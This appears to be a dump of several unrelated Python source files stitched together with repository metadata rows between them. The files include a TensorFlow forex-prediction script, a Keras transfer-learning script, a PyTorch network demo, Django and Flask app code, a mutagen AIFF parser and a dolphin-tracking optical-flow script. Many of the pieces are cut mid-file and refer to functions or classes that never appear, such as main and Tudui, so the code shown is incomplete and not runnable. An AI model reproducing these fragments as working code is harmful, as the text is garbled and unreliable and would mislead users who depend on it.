optimizer = tf.train.AdamOptimizer(learning_rate)
#optimizer = tf.train.FtrlOptimizer(learning_rate)
train_op = optimizer.minimize(loss_op)
# Evaluate model (with test logits, for dropout to be disabled)
correct_pred = tf.equal(tf.argmax(prediction, 1), tf.argmax(Y, 1))
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
y_p = tf.argmax(prediction, 1)
init = tf.global_variables_initializer()
# Initialize the variables (i.e. assign their default value)
test_len = len(dfs[-1])
test_data = dfs[-1]
closes = origs.loc[test_data.index].values
test_data.reset_index(drop=True,inplace=True)
test_true = test_data['Period_4_Lookforward'].values
test_label = np.array([test_data['Period_4_Lookforward'] == 0,test_data['Period_4_Lookforward'] == 1]).reshape((-1,2))
test_data = test_data.drop(['Period_4_Lookforward'],axis=1)
test_data = test_data.as_matrix()
test_data = test_data.reshape((-1, timesteps, num_input))
max_fails = 10
fails = 0
min_improv = .00000001
min_loss = 99
max_f1 = 0
config = tf.ConfigProto()
config.gpu_options.allow_growth=True
config.intra_op_parallelism_threads=4
config.inter_op_parallelism_threads=4
with tf.Session(config=config) as sess:
# Run the initializer
sess.run(init)
start_time = time.time()
for step in range(1, training_steps+1):
batch_x= dfs[ind]
#print(len(batch_x),'rows')
ind = (ind + 1)%(len(dfs)-1)
y_true = batch_x['Period_4_Lookforward'].values
batch_y =np.array([batch_x['Period_4_Lookforward'] == 0,batch_x['Period_4_Lookforward'] == 1]).reshape((-1,2))
batch_x = batch_x.drop(['Period_4_Lookforward'],axis=1)
# Reshape data to get 28 seq of 28 elements
batch_x = batch_x.as_matrix()
batch_x = batch_x.reshape((batch_size, timesteps, num_input))
# Run optimization op (backprop)
sess.run(train_op, feed_dict={X: batch_x, Y: batch_y})
# if(learning_rate > .0001):
# learning_rate = learning_rate/10
# optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
# train_op = optimizer.minimize(loss_op)
if step % display_step == 0 or step == 1:
# Calculate batch loss and accuracy
loss, acc,y_pred = sess.run([loss_op, accuracy,y_p], feed_dict={X: batch_x,
Y: batch_y})
loss2, acc2,test_pred = sess.run([loss_op, accuracy,y_p], feed_dict={X: test_data,
Y: test_label})
test_f1 = f1_score(test_true,test_pred)
print("Step " + "{:07d}".format(step) + ",L= " + \
"{:.6f}".format(loss) + ",Tr=" + \
"{:.3f}".format(acc) + ",Te=" + \
"{:.3f}".format(acc2) + ",F1(Tr)={:.3f}".format(f1_score(y_true,y_pred)) + \
",F1(Te)={:.8f}".format(test_f1))
if(loss < (min_loss-min_improv) or test_f1 > max_f1):
min_loss = loss
fails = 0
max_f1 = max(max_f1,test_f1)
else:
fails = fails + 1
if(fails > max_fails):
print('Ended early due to failure to improve')
break
duration = time.time() - start_time
print("\nOptimization Finished in {:.4f}s ({:0.8f} per step)\n\tMax of {:.4f}".format(duration,duration/step,max_f1))
# Calculate accuracy for 128 mnist test images
print("Final Testing Accuracy {:0.4f}%".format(f1_score(test_true,sess.run(y_p, feed_dict={X: test_data, Y: test_label}))))
last_price = 0
gain = 1
ind = 0
min_gain = 1
max_gain = 1
for row in test_data:
output = sess.run(y_p,feed_dict={X:[row]})[0]
if(output == 1):
if(last_price == 0):
last_price = closes[ind]
if(closes[ind] < last_price):
gain = gain * (1+((last_price - closes[ind]))*20)
min_gain = min(gain,min_gain)
max_gain = max(gain,max_gain)
last_price = 0
else:
if(last_price != 0):
gain = gain * (1+((last_price - closes[ind]))*20)
min_gain = min(gain,min_gain)
max_gain = max(gain,max_gain)
last_price = 0
ind = ind + 1
print(ind,"rows gives",gain)
print(min_gain," | ",max_gain)
#saver = tf.train.Saver()
#saver.save(sess, "D:\\dev\\forex_17\\model.ckpt")
| 42.936441 | 220 | 0.589954 |
b0f85d4de8f913a7c50b0d59c38e3f8dc18c049b | 2,375 | py | Python | src/napari_live_recording/__init__.py | jethro33/napari-live-recording | 6c3fcc33bd18cd090e3f89971b630d1800e29e4d | [
"MIT"
] | 7 | 2021-10-11T17:45:33.000Z | 2022-02-07T16:10:42.000Z | src/napari_live_recording/__init__.py | jethro33/napari-live-recording | 6c3fcc33bd18cd090e3f89971b630d1800e29e4d | [
"MIT"
] | 2 | 2021-11-01T09:00:11.000Z | 2022-01-24T16:21:05.000Z | src/napari_live_recording/__init__.py | jethro33/napari-live-recording | 6c3fcc33bd18cd090e3f89971b630d1800e29e4d | [
"MIT"
] | null | null | null | from napari.viewer import Viewer
import napari_live_recording.devices as devices
from napari_live_recording.widgets import CameraSelection
from napari_live_recording.control import Controller
from qtpy.QtWidgets import QWidget, QFormLayout, QGroupBox | 45.673077 | 105 | 0.663579 |
b0f8a636893a665d94b32f86e052882874326b1a | 4,277 | py | Python | Chapter08/inceptionV3.py | wikibook/deep-learning-reference | 18d2ca2ded4256b2ddbac6e76d57531ca13e6e30 | [
"MIT"
] | 2 | 2020-02-13T05:45:20.000Z | 2020-04-11T05:58:02.000Z | Chapter08/inceptionV3.py | wikibook/deep-learning-reference | 18d2ca2ded4256b2ddbac6e76d57531ca13e6e30 | [
"MIT"
] | null | null | null | Chapter08/inceptionV3.py | wikibook/deep-learning-reference | 18d2ca2ded4256b2ddbac6e76d57531ca13e6e30 | [
"MIT"
] | null | null | null | # Deep Learning Quick Reference Chapter 8: Transfer Learning
# Mike Bernico <mike.bernico@gmail.com>
# seed random number generators before importing keras
import numpy as np
np.random.seed(42)
import tensorflow as tf
tf.set_random_seed(42)
from keras.applications.inception_v3 import InceptionV3
from keras.models import Model
from keras.layers import Dense, GlobalAveragePooling2D
from keras.callbacks import TensorBoard, EarlyStopping, CSVLogger, ModelCheckpoint
from keras.preprocessing.image import ImageDataGenerator
from keras.optimizers import SGD
import os
import argparse
if __name__ == "__main__":
main()
| 34.491935 | 133 | 0.710545 |
b0f8d8e1a99343fc9166ec575752cd7be6e45cee | 827 | py | Python | Pytorch/5-CNN/nn_Sequential.py | pengchenyu111/PaperCodeReplication | 7b8681654e25b7d707f4b4d7ebcfb85ffc0fd52a | [
"Apache-2.0"
] | null | null | null | Pytorch/5-CNN/nn_Sequential.py | pengchenyu111/PaperCodeReplication | 7b8681654e25b7d707f4b4d7ebcfb85ffc0fd52a | [
"Apache-2.0"
] | null | null | null | Pytorch/5-CNN/nn_Sequential.py | pengchenyu111/PaperCodeReplication | 7b8681654e25b7d707f4b4d7ebcfb85ffc0fd52a | [
"Apache-2.0"
] | null | null | null | import torch
from torch import nn
from torch.nn import Conv2d, MaxPool2d, Flatten, Linear, Sequential
from torch.utils.tensorboard import SummaryWriter
# Build the network defined above and sanity-check it on a dummy batch.
model = Tudui()
print(model)

# One all-ones batch of 64 samples, 3 channels, 32x32 each.
dummy_batch = torch.ones((64, 3, 32, 32))
predictions = model(dummy_batch)
print(predictions.shape)

# Export the model graph for TensorBoard, then release the writer.
tb_writer = SummaryWriter("./logs")
tb_writer.add_graph(model, dummy_batch)
tb_writer.close()
| 22.972222 | 67 | 0.584039 |
b0fb6f704b8d712fad268b480c2d25cc8bc409f5 | 1,232 | py | Python | src/brewlog/utils/query.py | zgoda/brewlog | 13a930b328f81d01a2be9aca07d3b14703b80faa | [
"BSD-3-Clause"
] | 3 | 2019-03-11T04:30:06.000Z | 2020-01-26T03:21:52.000Z | src/brewlog/utils/query.py | zgoda/brewlog | 13a930b328f81d01a2be9aca07d3b14703b80faa | [
"BSD-3-Clause"
] | 23 | 2019-02-06T20:37:37.000Z | 2020-06-01T07:08:35.000Z | src/brewlog/utils/query.py | zgoda/brewlog | 13a930b328f81d01a2be9aca07d3b14703b80faa | [
"BSD-3-Clause"
] | null | null | null | from typing import Optional
from flask import url_for
from flask_sqlalchemy import BaseQuery
from ..ext import db
from ..models import Brew, BrewerProfile
def public_or_owner(query: BaseQuery, user: Optional[BrewerProfile]) -> BaseQuery:
    """Restrict a Brew query to rows the actor may see.

    Anonymous actors (``user is None``) see only brews whose brewer profile
    and brew record are both public.  A signed-in actor additionally sees
    every brew they own.

    :param query: query over Brew objects
    :type query: BaseQuery
    :param user: actor object, may be None
    :type user: Optional[BrewerProfile]
    :return: filtered query
    :rtype: BaseQuery
    """
    if user is None:
        return query.filter(
            BrewerProfile.is_public.is_(True), Brew.is_public.is_(True)
        )

    visible_to_all = db.and_(
        BrewerProfile.is_public.is_(True), Brew.is_public.is_(True)
    )
    return query.filter(db.or_(BrewerProfile.id == user.id, visible_to_all))
| 29.333333 | 84 | 0.649351 |
b0fda5ff40de8e081dd602a278f08974ff524613 | 11,355 | py | Python | adventures/bucketlist/tests/test_api.py | lakivisi-zz/adventures | f094ac3fa1d5c85d65650c9cdc2ff2f60f9189a5 | [
"MIT"
] | null | null | null | adventures/bucketlist/tests/test_api.py | lakivisi-zz/adventures | f094ac3fa1d5c85d65650c9cdc2ff2f60f9189a5 | [
"MIT"
] | null | null | null | adventures/bucketlist/tests/test_api.py | lakivisi-zz/adventures | f094ac3fa1d5c85d65650c9cdc2ff2f60f9189a5 | [
"MIT"
] | 1 | 2021-01-14T21:27:32.000Z | 2021-01-14T21:27:32.000Z | from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from bucketlist.models import Bucketlist, Item
from bucketlist.tests.factories import (BucketlistFactory,
UserFactory,
ItemFactory)
# Create your tests here.
| 41.593407 | 88 | 0.574813 |
b0fdbad819a58bb24f68fffc89eae7b13da8ac0a | 514 | py | Python | src/model/match.py | HarborYuan/Student-Information-Management-System | 7226bdea9a422cc88876ba58f1e36e4f7087342d | [
"Apache-2.0"
] | null | null | null | src/model/match.py | HarborYuan/Student-Information-Management-System | 7226bdea9a422cc88876ba58f1e36e4f7087342d | [
"Apache-2.0"
] | null | null | null | src/model/match.py | HarborYuan/Student-Information-Management-System | 7226bdea9a422cc88876ba58f1e36e4f7087342d | [
"Apache-2.0"
] | 1 | 2018-12-03T11:43:37.000Z | 2018-12-03T11:43:37.000Z | import re
| 19.769231 | 77 | 0.486381 |
b0feb9c47583568b91cc55ff1a17eb9a915a0f41 | 1,626 | py | Python | framework/repository/info.py | jarret/bitcoin_helpers | 4b6155ea3b004ad58a717b36cd58138d058281b1 | [
"MIT"
] | null | null | null | framework/repository/info.py | jarret/bitcoin_helpers | 4b6155ea3b004ad58a717b36cd58138d058281b1 | [
"MIT"
] | null | null | null | framework/repository/info.py | jarret/bitcoin_helpers | 4b6155ea3b004ad58a717b36cd58138d058281b1 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import json
import os
import sys
from framework.path.path import Path
from framework.file.io import read_file
from framework.git.path import GitPath
REPO_INFO_FILENAME = ".bitcoin-maintainer-tools.json"
FAILBACK_REPO_INFO_FILENAME = ".fallback-bitcoin-maintainer-tools.json"
| 36.954545 | 79 | 0.674662 |
b0ff358c2ba4c5c042b20c8c472910cebd571e0f | 861 | py | Python | backend/members/schema.py | singsaker/intern | 9376732c6d537f46443ad43afa51e82df2005da8 | [
"MIT"
] | 4 | 2021-10-06T19:09:12.000Z | 2022-03-28T12:14:42.000Z | backend/members/schema.py | singsaker/intern | 9376732c6d537f46443ad43afa51e82df2005da8 | [
"MIT"
] | 2 | 2021-11-30T16:07:05.000Z | 2022-02-17T23:57:00.000Z | backend/members/schema.py | singsaker/intern | 9376732c6d537f46443ad43afa51e82df2005da8 | [
"MIT"
] | null | null | null | import graphene
import graphql_jwt
from .resolvers import MemberResolvers
from .types import MemberType, UserType
| 34.44 | 70 | 0.773519 |
b0ffaa7976be25e795d5abe04edf6fd2fd0631eb | 1,540 | py | Python | cookie_manager/security_decorator.py | ScholarPack/cookie-manager | 342eaf19d4ebbe83319306e4a3afcc3988f61d3d | [
"MIT"
] | 10 | 2020-02-26T14:13:05.000Z | 2021-07-30T02:16:47.000Z | cookie_manager/security_decorator.py | ScholarPack/cookie-manager | 342eaf19d4ebbe83319306e4a3afcc3988f61d3d | [
"MIT"
] | 13 | 2020-02-26T10:42:09.000Z | 2021-09-30T13:26:23.000Z | cookie_manager/security_decorator.py | ScholarPack/cookie-manager | 342eaf19d4ebbe83319306e4a3afcc3988f61d3d | [
"MIT"
] | 3 | 2020-03-29T00:49:23.000Z | 2020-07-24T16:26:20.000Z | from functools import wraps
from typing import List, Any
from cookie_manager import CookieManager
| 34.222222 | 96 | 0.619481 |
7c0015d18f7709ad1f58810e4e4fbcf0c3ae1358 | 6,394 | py | Python | mutagen/aiff.py | lucienimmink/scanner.py | cecaa0a570ba8058321dea1c8efa9f77868effb3 | [
"MIT"
] | 2 | 2022-03-14T15:34:14.000Z | 2022-03-23T17:05:42.000Z | mutagen/aiff.py | lucienimmink/scanner.py | cecaa0a570ba8058321dea1c8efa9f77868effb3 | [
"MIT"
] | null | null | null | mutagen/aiff.py | lucienimmink/scanner.py | cecaa0a570ba8058321dea1c8efa9f77868effb3 | [
"MIT"
] | 2 | 2020-09-17T08:27:12.000Z | 2021-08-23T11:13:52.000Z | # -*- coding: utf-8 -*-
# Copyright (C) 2014 Evan Purkhiser
# 2014 Ben Ockmore
# 2019-2020 Philipp Wolfer
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
"""AIFF audio stream information and tags."""
import struct
from struct import pack
from mutagen import StreamInfo, FileType
from mutagen.id3._util import ID3NoHeaderError, error as ID3Error
from mutagen._iff import (
IffChunk,
IffContainerChunkMixin,
IffFile,
IffID3,
InvalidChunk,
error as IffError,
)
from mutagen._util import (
convert_error,
loadfile,
endswith,
)
__all__ = ["AIFF", "Open", "delete"]
# based on stdlib's aifc
_HUGE_VAL = 1.79769313486231e+308
def read_float(data):
    """Decode a 10-byte big-endian IEEE 754 80-bit "extended" float.

    AIFF stores the sample rate in this format.  Raises OverflowError for
    inf/nan (exponent field all ones); the final scaling can also raise
    OverflowError for values outside double range.
    """
    assert len(data) == 10
    exponent, mant_high, mant_low = struct.unpack('>hLL', data)

    # The sign bit is the top bit of the first 16-bit word, so a negative
    # signed short means a negative number; strip the bit back off.
    if exponent < 0:
        sign = -1
        exponent += 0x8000
    else:
        sign = 1

    if exponent == 0 and mant_high == 0 and mant_low == 0:
        magnitude = 0.0
    elif exponent == 0x7FFF:
        raise OverflowError("inf and nan not supported")
    else:
        # 64-bit explicit mantissa, scaled by 2**(exponent - bias - 63).
        mantissa = mant_high * 0x100000000 + mant_low
        magnitude = mantissa * pow(2.0, exponent - 16383 - 63)

    return sign * magnitude
class AIFFFormChunk(AIFFChunk, IffContainerChunkMixin):
"""The AIFF root chunk."""
class AIFFFile(IffFile):
"""Representation of a AIFF file"""
class AIFFInfo(StreamInfo):
    """AIFFInfo()

    AIFF audio stream information.

    Information is parsed from the COMM chunk of the AIFF file.

    Attributes:
        length (`float`): audio length, in seconds
        bitrate (`int`): audio bitrate, in bits per second
        channels (`int`): The number of audio channels
        sample_rate (`int`): audio sample rate, in Hz
        bits_per_sample (`int`): The audio sample size
    """

    # Class-level defaults; instances presumably overwrite these while
    # parsing the COMM chunk (parsing code not visible in this excerpt) —
    # TODO confirm.
    length = 0
    bitrate = 0
    channels = 0
    sample_rate = 0
    # NOTE(review): the docstring documents ``bits_per_sample`` but no
    # class-level default is defined for it here — verify against the
    # parsing code.
class _IFFID3(IffID3):
"""A AIFF file with ID3v2 tags"""
Open = AIFF
| 25.99187 | 78 | 0.610416 |
7c007a5d23b8a2015cedebc0918ddd73086265d1 | 398 | py | Python | secrets_example.py | fuzzysearch404/SpotifyPlaylistScripts | 17915742ca666edd8376f04d0e2687b207c32471 | [
"MIT"
] | null | null | null | secrets_example.py | fuzzysearch404/SpotifyPlaylistScripts | 17915742ca666edd8376f04d0e2687b207c32471 | [
"MIT"
] | 1 | 2021-11-03T13:40:55.000Z | 2021-11-03T13:40:55.000Z | secrets_example.py | fuzzysearch404/SpotifyPlaylistScripts | 17915742ca666edd8376f04d0e2687b207c32471 | [
"MIT"
] | null | null | null | # Spotify web application client ID
CLIENT_ID = 'your_client_id'
# Spotify web application client secret
CLIENT_SECRET = 'your_client_secret'
# Redirect URI. This can be any uri.
# Howerver, you MUST add this uri to your Spotify web app's settings.
# Application settings -> Edit Settings -> Redirect URIs.
# Add it there and save the settings.
REDIRECT_URI = 'https://localhost:2020/done' | 44.222222 | 70 | 0.753769 |
7c02196ff08fda517c472d6a6325f606f3df8cac | 1,210 | py | Python | tradeiobot/db/stores/abstractstore.py | hcv57/tradeio-bot | a4c9f96a104e20ca0618d8d787cfef3599c8ebb7 | [
"MIT"
] | 2 | 2018-10-28T18:47:02.000Z | 2019-10-09T14:52:04.000Z | tradeiobot/db/stores/abstractstore.py | hcv57/tradeio-bot | a4c9f96a104e20ca0618d8d787cfef3599c8ebb7 | [
"MIT"
] | null | null | null | tradeiobot/db/stores/abstractstore.py | hcv57/tradeio-bot | a4c9f96a104e20ca0618d8d787cfef3599c8ebb7 | [
"MIT"
] | null | null | null | import abc
| 26.888889 | 56 | 0.602479 |
7c037d89e3a9bf24f7302ca98b6d3dd08cac776e | 11,062 | py | Python | ML/meanvel.py | lewisfish/Triton-dolphin | bc7256485e1bd943e0b9b3017c214c82e26905f3 | [
"MIT"
] | null | null | null | ML/meanvel.py | lewisfish/Triton-dolphin | bc7256485e1bd943e0b9b3017c214c82e26905f3 | [
"MIT"
] | null | null | null | ML/meanvel.py | lewisfish/Triton-dolphin | bc7256485e1bd943e0b9b3017c214c82e26905f3 | [
"MIT"
] | null | null | null | from concurrent import futures
from itertools import repeat
import pathlib
from pathlib import Path
import pickle
import time
from typing import List, Tuple, Union
import cv2 as cv2
import hdbscan
import numpy as np
import pims
from sklearn.cluster import KMeans
from sklearn.preprocessing import StandardScaler
from tqdm import tqdm
from gps import getAltitude
from ocr import getMagnification
def _getFullFileName(files: List[pathlib.PosixPath], target: str) -> pathlib.PosixPath:
'''Match a file to list of full filenames
Parameters
----------
files : List[pathlib.PosixPath]
List of file name to match to
target : str
File to be matched with full path
Returns
-------
file : pathlib.PosixPath
Full filename
'''
for file in files:
if target in str(file):
return file
def getFrames(file: str, position: int, offset: int) -> Tuple[List[pims.frame.Frame], List[int], float]:
    """Read three frames from a video for optical-flow analysis.

    The central frame sits at ``position``; the two flanking frames are
    ``offset`` frames before and after it.

    Parameters
    ----------
    file : str
        Video file to read frames from.
    position : int
        Index of the central frame.
    offset : int
        Frame distance of the two flanking frames.

    Returns
    -------
    Tuple[List[pims.frame.Frame], List[int], float]
        The three frames, their indices, and the video frame rate.
    """
    assert position > offset

    reader = pims.PyAVVideoReader(file)
    positions = [position - offset, position, position + offset]
    frames = [reader[p] for p in positions]

    return frames, positions, float(reader._frame_rate)
def getFramesCV2(file: str, position: int, offset: int):
    """Read three frames from a video with OpenCV for optical-flow analysis.

    The central frame sits at ``position``; the two flanking frames are
    ``offset`` frames before and after it. Frames are converted from
    OpenCV's BGR order to RGB.

    Parameters
    ----------
    file : str
        Video file to read frames from.
    position : int
        Index of the central frame.
    offset : int
        Frame distance of the two flanking frames.

    Returns
    -------
    Tuple[List[np.ndarray], List[int], float]
        The three RGB frames, their indices, and the video frame rate.
    """
    assert position >= offset

    cap = cv2.VideoCapture(str(file))
    try:
        fps = cap.get(cv2.CAP_PROP_FPS)
        positions = [position - offset, position, position + offset]
        frames = []
        # The original duplicated this seek/read/convert sequence three
        # times and never released the capture handle.
        for pos in positions:
            cap.set(cv2.CAP_PROP_POS_FRAMES, pos)
            _, frame = cap.read()
            frames.append(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))
    finally:
        # Fix: release the VideoCapture (was leaked on every call).
        cap.release()

    return frames, positions, fps
def cropFrames(frames: List[pims.frame.Frame], box: List[int]) -> List[pims.frame.Frame]:
    """Crop every frame to the same rectangular region.

    Parameters
    ----------
    frames : List[pims.frame.Frame]
        Frames to crop.
    box : List[int]
        Crop rectangle in the form ``[y0, x0, y1, x1]``.

    Returns
    -------
    List[pims.frame.Frame]
        The cropped frames, in the original order.
    """
    y0, x0, y1, x1 = box
    return [frame[y0:y1, x0:x1] for frame in frames]
def preprocessFrame(frame: pims.frame.Frame, fg) -> Tuple[np.ndarray]:
    """Convert a frame to grayscale and extract a denoised foreground mask.

    Parameters
    ----------
    frame : pims.frame.Frame
        RGB frame to preprocess.
    fg
        Background-subtractor object (its ``apply`` yields the foreground
        mask).

    Returns
    -------
    Tuple[np.ndarray]
        Dilated binary foreground mask and the grayscale frame.
    """
    gray = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)
    mask = fg.apply(gray)
    smoothed = cv2.GaussianBlur(mask, (5, 5), 0)
    binary = cv2.threshold(smoothed, 20, 255, cv2.THRESH_BINARY)[1]
    dilated = cv2.dilate(binary, None, iterations=3)
    return dilated, gray
def processContours(contours: List[float], contourpoints: List[List[float]], frame: pims.frame.Frame, debug=False) -> Tuple[List[List[float]], pims.frame.Frame]:
    """Append each contour's bounding-box centre to ``contourpoints``.

    Parameters
    ----------
    contours : List[float]
        Contours to compute bounding boxes for.
    contourpoints : List[List[float]]
        Accumulator of ``[cx, cy]`` centres; extended in place.
    frame : pims.frame.Frame
        Frame the contours came from.
    debug : bool, optional
        When True, draw each bounding box onto ``frame``.

    Returns
    -------
    Tuple[List[List[float]], pims.frame.Frame]
        The (mutated) centre list and the frame.
    """
    for contour in contours:
        x, y, w, h = cv2.boundingRect(contour)
        contourpoints.append([x + (w / 2), y + (h / 2)])
        if debug:
            cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)

    return contourpoints, frame
def processFile(file: str) -> List[Union[str, int, List[float], int]]:
    """Parse an annotation CSV file.

    Each data row has the form::

        name,framenum,x1,y1,x2,y2,label,vel,kmeans,hdbscan

    The first (header) line is skipped. The trailing vel/kmeans/hdbscan
    columns are read but not returned.

    Parameters
    ----------
    file : str
        CSV file to read.

    Returns
    -------
    List[Union[str, int, List[float], int]]
        One ``[name, framenum, box, label]`` entry per data row, where
        ``box`` is ``[x1, y1, x2, y2]`` as ints.
    """
    info = []
    # Fix: use a context manager — the original opened the file and never
    # closed the handle.
    with open(file, "r") as f:
        lines = f.readlines()[1:]
    for line in lines:
        name, framenum, *box, label, vel, kmeans, hdbscan = line.split(",")
        info.append([name, int(framenum), [int(x) for x in box], int(label)])

    return info
def trainParallel(workers=8):
    """Run ``train`` over every annotation row in parallel.

    Reads the training CSV, maps ``train`` across the rows with a process
    pool, and flattens the per-row velocity lists into one list.

    Parameters
    ----------
    workers : int, optional
        Number of worker processes, default=8.
    """
    rows = processFile("../data/train.csv")

    with futures.ProcessPoolExecutor(workers) as pool:
        results = list(tqdm(pool.map(train, rows), total=len(rows)))

    velocities = []
    for row_velocities in results:
        velocities.extend(row_velocities)
def train(info: Tuple[str, List[float], int], root="/data/lm959/data/", crop=False):
    """Compute optical-flow velocities (in m/s) for one annotated frame.

    Reads the annotated frame and two frames +/- 15 frames away, tracks
    foreground contour centres with Lucas-Kanade optical flow, and scales
    the pixel velocities to metres per second using an empirical
    altitude/magnification-based dolphin-length estimate.

    Parameters
    ----------
    info : Tuple[str, List[float], int]
        Video filename, frame number, bounding box, and label of the object.
    root : str, optional
        Root of the file system location where the videos are stored.
    crop : bool, optional
        If True, crop the frames to the annotation bounding box first.

    Returns
    -------
    velocitymeterPerSecond : np.ndarray
        Velocities in m/s for the tracked contour points.
    """
    lk_params = dict(winSize=(15, 15),
                     maxLevel=2,
                     criteria=(cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))

    fgbg = cv2.createBackgroundSubtractorMOG2()

    root = Path(root)
    videoFiles = list(root.glob("**/*.mp4"))

    vidname, fnumber, box, label = info
    fullname = _getFullFileName(videoFiles, vidname)

    frames, framenums, fps = getFramesCV2(fullname, fnumber, offset=15)

    contourpoints = []
    fpsPerFrame = 1. / fps

    alt = getAltitude(fullname, framenums[1], gpsdataPath="../data/gps/")
    magn = getMagnification(frames[1])
    # Empirical pixel length of a dolphin as a function of zoom and altitude.
    dolphLength = 1714 * (magn / alt) + 16.5
    dolphPixelPerSecond = dolphLength / 2.

    if crop:
        frames = cropFrames(frames, box)

    frame = frames[0]
    for i in range(0, 2):
        dilated, gray1 = preprocessFrame(frame, fgbg)
        contours, _ = cv2.findContours(dilated, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
        contourpoints, frame = processContours(contours, contourpoints, frame)
        p0 = np.array(contourpoints, np.float32)
        gray2 = cv2.cvtColor(frames[i + 1], cv2.COLOR_RGB2GRAY)
        try:
            p1, _, _ = cv2.calcOpticalFlowPyrLK(gray1, gray2, p0, None, **lk_params)
            diff = np.array(p1) - np.array(p0)
            velocity = diff / fpsPerFrame
            velocity = [np.sqrt(item[0]**2 + item[1]**2) for item in velocity]
            frame = frames[1].copy()
            contourpoints = []
        except Exception:
            # Optical flow can fail when no contour points were found.
            # Fix: was a bare `except:` which also swallowed
            # KeyboardInterrupt/SystemExit.
            # NOTE(review): if both iterations fail, `velocity` is never
            # bound and the division below raises NameError — confirm
            # whether a fallback (e.g. empty array) is intended.
            continue

    # Fix: `velocity` is a plain Python list at this point; wrap it in
    # np.array so the element-wise division works (list / float raises
    # TypeError) and the function returns the documented np.ndarray.
    velocitymeterPerSecond = np.array(velocity) / dolphPixelPerSecond
    return velocitymeterPerSecond
def calcLabels():
    """Cluster mean optical-flow velocities with KMeans and label the
    training annotations.

    Re-runs ``train`` (cropped to each annotation box) over the training
    CSV, loads the precomputed velocity distribution from
    ``velocities.npy``, fits a 6-cluster KMeans on the standardised
    velocities, then writes ``[name, framenum, x1, y1, x2, y2, label,
    mean_velocity, cluster]`` rows to ``train-data-kmeans.npy``.
    """
    from sklearn.cluster import KMeans
    data = processFile("../data/train.csv")
    data = data  # no-op assignment — kept as-is
    workers = 8
    with futures.ProcessPoolExecutor(workers) as executor:
        # crop=True: velocities are computed inside each annotation box
        res = list(tqdm(executor.map(train, data, repeat("/data/lm959/data/"), repeat(True)), total=len(data)))
    # Velocity distribution precomputed over full frames (see trainParallel)
    with open('velocities.npy', "rb") as f:
        arrays = np.load(f)
    # model = hdbscan.HDBSCAN(min_cluster_size=1000, min_samples=5, leaf_size=100, prediction_data=True).fit(arrays.reshape(-1, 1))
    from sklearn.preprocessing import StandardScaler
    scaler = StandardScaler()
    TotalVelocity = scaler.fit_transform(arrays.reshape(-1, 1))
    # NOTE(review): `precompute_distances` was deprecated/removed in newer
    # scikit-learn releases — confirm the pinned sklearn version.
    model = KMeans(n_clusters=6, random_state=0, max_iter=300, precompute_distances=True, algorithm='full').fit(np.array(TotalVelocity).reshape(-1, 1))
    outshizz = []
    for i, item in enumerate(res):
        vels = np.mean(item)  # mean velocity (m/s) for this annotation
        test_labels = model.predict(vels.reshape(-1, 1))
        tmp = [data[i][0], data[i][1], data[i][2][0], data[i][2][1], data[i][2][2], data[i][2][3], data[i][3], vels, test_labels[0]]
        outshizz.append(tmp)
    with open('train-data-kmeans.npy', 'wb') as f:
        np.save(f, np.array(outshizz))
# def infer(vels, tmper):
# import pickle
# with open('model.pickle', "rb") as f:
# loaded_obj = pickle.load(f)
# test_labels, strengths = hdbscan.approximate_predict(loaded_obj, np.array(vels).reshape(-1, 1))
# results = trainParallel(workers=6)
# calcLabels()
# elbowPlot()
| 28.29156 | 176 | 0.626831 |
7c088d45f5f62ebef1ceafec95293618d4108e74 | 390 | py | Python | os_scrapy_record/spiders/__init__.py | zanachka/os-scrapy-record | 03d0cafbea74c981a72d5d7c8a3e28f05e487689 | [
"MIT"
] | 2 | 2020-05-13T12:55:01.000Z | 2020-07-24T06:52:49.000Z | os_scrapy_record/spiders/__init__.py | zanachka/os-scrapy-record | 03d0cafbea74c981a72d5d7c8a3e28f05e487689 | [
"MIT"
] | 1 | 2020-05-22T09:03:04.000Z | 2020-05-22T09:31:45.000Z | os_scrapy_record/spiders/__init__.py | zanachka/os-scrapy-record | 03d0cafbea74c981a72d5d7c8a3e28f05e487689 | [
"MIT"
] | 2 | 2020-07-21T00:54:09.000Z | 2020-10-29T18:10:03.000Z | # This package will contain the spiders of your Scrapy project
#
# Please refer to the documentation for information on how to create and manage
# your spiders.
import scrapy
| 19.5 | 79 | 0.697436 |
7c094dc9f6789987096d646f2920ee372eb6f1b8 | 3,409 | py | Python | zero_paper/models.py | PLsergent/zero-paper | 4663e0e9976447419b5da5cdd32e57dccfc32125 | [
"MIT"
] | null | null | null | zero_paper/models.py | PLsergent/zero-paper | 4663e0e9976447419b5da5cdd32e57dccfc32125 | [
"MIT"
] | null | null | null | zero_paper/models.py | PLsergent/zero-paper | 4663e0e9976447419b5da5cdd32e57dccfc32125 | [
"MIT"
] | null | null | null | from django.db import models
from django.contrib.auth.models import User
from django.utils import timezone
from django.dispatch import receiver
import os
import shutil
def upload_to(instance, filename):
    """Build the storage path for an uploaded file.

    Walks the instance's folder chain from its immediate folder up to the
    root, prefixing each ancestor folder's name, and anchors the result
    under ``files/``.

    Parameters
    ----------
    instance
        Object with a ``folder`` attribute; each folder exposes ``name``
        and ``parent_folder``.
    filename : str
        Name of the file being uploaded.

    Returns
    -------
    str
        Path of the form ``files/<root>/.../<folder>/<filename>``.
    """
    # Original code shadowed the function name with a local variable
    # (`upload_to = ""`) and used a `while True`/`break` loop; this is the
    # same traversal written plainly.
    path = ""
    if instance.folder:
        folder = instance.folder
        path = folder.name + "/"
        while folder.parent_folder:
            path = folder.parent_folder.name + "/" + path
            folder = folder.parent_folder
    return "files/" + path + filename
| 29.903509 | 94 | 0.661484 |
